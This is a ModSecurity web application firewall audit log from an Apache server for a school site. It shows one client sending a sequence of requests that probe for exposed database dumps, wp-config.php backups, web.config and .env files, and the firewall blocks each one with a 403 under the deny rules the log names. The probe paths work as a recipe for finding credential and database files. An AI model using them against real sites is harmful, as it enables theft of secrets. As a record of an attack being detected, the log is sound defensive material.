1748084786083460 606 (- - -) Stopwatch2: 1748084786083460 606; combined=232, p1=202, p2=0, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a37dd3f-Z-- --4e46a134-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbToAAAAEI 103.236.140.4 56684 103.236.140.4 8181 --4e46a134-B-- GET /db.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4e46a134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e46a134-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790534626 2251 (- - -) Stopwatch2: 1748084790534626 2251; combined=861, p1=394, p2=437, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e46a134-Z-- --670cce35-A-- [24/May/2025:18:06:30 +0700] aDGoNuO2UzDOKMmK0i6lHwAAABc 103.236.140.4 56686 103.236.140.4 8181 --670cce35-B-- GET /database.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --670cce35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --670cce35-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790661949 1916 (- - -) Stopwatch2: 1748084790661949 1916; combined=765, p1=346, p2=386, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --670cce35-Z-- --2380395d-A-- [24/May/2025:18:06:30 +0700] aDGoNvmzt4abyoi_U9kAdgAAAIw 103.236.140.4 56688 103.236.140.4 8181 --2380395d-B-- GET /dump.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --2380395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2380395d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790741359 1707 (- - -) Stopwatch2: 1748084790741359 1707; combined=621, p1=303, p2=292, p3=0, p4=0, p5=26, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2380395d-Z-- --ef336d07-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbToQAAAEQ 103.236.140.4 56690 103.236.140.4 8181 --ef336d07-B-- GET /sql_backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --ef336d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef336d07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790756796 1595 (- - -) Stopwatch2: 1748084790756796 1595; combined=626, p1=308, p2=291, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef336d07-Z-- --c123b702-A-- [24/May/2025:18:06:30 +0700] aDGoNuunkxaVeh4NwhbTogAAAFQ 103.236.140.4 56692 103.236.140.4 8181 --c123b702-B-- GET /backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c123b702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c123b702-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790886957 1744 (- - -) Stopwatch2: 1748084790886957 1744; combined=661, p1=339, p2=294, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c123b702-Z-- --380a8865-A-- [24/May/2025:18:06:30 +0700] aDGoNjvI5DIWBJ2mFG5OHQAAAMM 103.236.140.4 56694 103.236.140.4 8181 --380a8865-B-- GET /api.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --380a8865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --380a8865-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790966458 1807 (- - -) Stopwatch2: 1748084790966458 1807; combined=682, p1=314, p2=324, p3=0, p4=0, p5=44, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --380a8865-Z-- --cde02828-A-- [24/May/2025:18:06:30 +0700] aDGoNvmzt4abyoi_U9kAdwAAAIs 103.236.140.4 56696 103.236.140.4 8181 --cde02828-B-- GET /config/backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --cde02828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde02828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084790971858 1957 (- - -) Stopwatch2: 1748084790971858 1957; combined=760, p1=315, p2=400, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde02828-Z-- --e57cb91d-A-- [24/May/2025:18:06:33 +0700] aDGoOfmzt4abyoi_U9kAfwAAAIo 103.236.140.4 56746 103.236.140.4 8181 --e57cb91d-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --e57cb91d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e57cb91d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793201690 705 (- - -) Stopwatch2: 1748084793201690 705; combined=257, p1=223, p2=0, p3=0, p4=0, p5=33, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e57cb91d-Z-- --d60bb64d-A-- [24/May/2025:18:06:33 +0700] aDGoOTvI5DIWBJ2mFG5OJAAAAMg 103.236.140.4 56748 103.236.140.4 8181 --d60bb64d-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --d60bb64d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d60bb64d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793418809 777 (- - -) Stopwatch2: 1748084793418809 777; combined=326, p1=240, p2=0, p3=0, p4=0, p5=86, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d60bb64d-Z-- --8a13d312-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lJwAAAAE 103.236.140.4 56750 103.236.140.4 8181 --8a13d312-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --8a13d312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a13d312-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793454531 770 (- - -) Stopwatch2: 1748084793454531 770; combined=285, p1=250, p2=0, p3=0, p4=0, p5=34, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a13d312-Z-- --69738711-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKAAAABg 103.236.140.4 56752 103.236.140.4 8181 --69738711-B-- GET /.wp-config.php.swp HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69738711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69738711-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793483956 736 (- - -) Stopwatch2: 1748084793483956 736; combined=271, p1=237, p2=0, p3=0, p4=0, p5=33, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69738711-Z-- --fada922f-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKQAAAAM 103.236.140.4 56754 103.236.140.4 8181 --fada922f-B-- GET /config/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --fada922f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fada922f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793644477 714 (- - -) Stopwatch2: 1748084793644477 714; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fada922f-Z-- --48161d44-A-- [24/May/2025:18:06:33 +0700] aDGoOeO2UzDOKMmK0i6lKgAAAAg 103.236.140.4 56764 103.236.140.4 8181 --48161d44-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --48161d44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48161d44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084793923607 765 (- - -) Stopwatch2: 1748084793923607 765; combined=286, p1=242, p2=0, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48161d44-Z-- --82bc4038-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLAAAAAI 103.236.140.4 56782 103.236.140.4 8181 --82bc4038-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --82bc4038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82bc4038-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794178272 808 (- - -) Stopwatch2: 1748084794178272 808; combined=275, p1=238, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82bc4038-Z-- --c6ae5908-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLQAAAA0 103.236.140.4 56784 103.236.140.4 8181 --c6ae5908-B-- GET /.env.dev HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c6ae5908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ae5908-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794375695 779 (- - -) Stopwatch2: 1748084794375695 779; combined=297, p1=256, p2=0, p3=0, p4=0, p5=40, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ae5908-Z-- --90f44343-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLgAAABE 103.236.140.4 56786 103.236.140.4 8181 --90f44343-B-- GET /.env.test HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --90f44343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f44343-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794408366 676 (- - -) Stopwatch2: 1748084794408366 676; combined=247, p1=217, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f44343-Z-- --7d60b442-A-- [24/May/2025:18:06:34 +0700] aDGoOuO2UzDOKMmK0i6lLwAAABc 103.236.140.4 56788 103.236.140.4 8181 --7d60b442-B-- GET /.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --7d60b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d60b442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084794506300 653 (- - -) Stopwatch2: 1748084794506300 653; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 